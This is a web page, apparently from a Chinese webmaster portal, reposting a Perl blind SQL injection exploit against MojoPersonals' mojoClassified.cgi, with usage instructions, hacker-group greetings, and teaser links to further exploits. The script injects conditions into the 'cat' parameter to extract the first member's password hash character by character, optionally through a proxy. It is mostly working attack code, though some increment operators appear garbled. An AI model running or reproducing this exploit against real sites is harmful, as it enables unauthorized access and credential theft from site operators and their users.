首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

所属分类: 网络安全 / Exploit 阅读数: 139
收藏 0 赞 0 分享
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoPersonals Blind SQL Injection Exploit #\n";
print " # (mojoClassified.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat=".$cat." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

更多精彩内容其他人还在看

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

|___________________________________________________| | |AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability |
收藏 0 赞 0 分享

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

#!/usr/bin/perl #inphex #PHPizabi v0.848b C1 HFP1 Remote Code Execution #http://www.dz-secure.com/tools/1/WebESploit.pl.txt #if you
收藏 0 赞 0 分享

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

vBulletin PhotoPost vBGallery v2.x Remote File Upload Found by : Cold z3ro e-mail : exploiter@hackteach.org Home page : www.H
收藏 0 赞 0 分享

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

############################################################### #################### Viva IslaM Viva IslaM #################### ## ##
收藏 0 赞 0 分享

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

############################################################################################ #
收藏 0 赞 0 分享

php Help Agent

##################################################### # Author : BeyazKurt # Contact : Djm-sut@Hotmail.Com # # Script : php Help
收藏 0 赞 0 分享

Comdev Web Blogger

____________________ ___ ___ ________ _ _____/_ ___ / | \_____ | __)_ / // ~ / | | \
收藏 0 赞 0 分享

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

<< In The Name Of GOD >> -------------------------------------------------------------
收藏 0 赞 0 分享

Galatolo Web Manager 1.3a

--== ============================================================================ ==-- --== Galatolo Web Manager 1.3a <= XSS / Remo
收藏 0 赞 0 分享

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

==================================================== | pSys v0.7.0 Alpha Multiple Remote File Include | (works only with
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22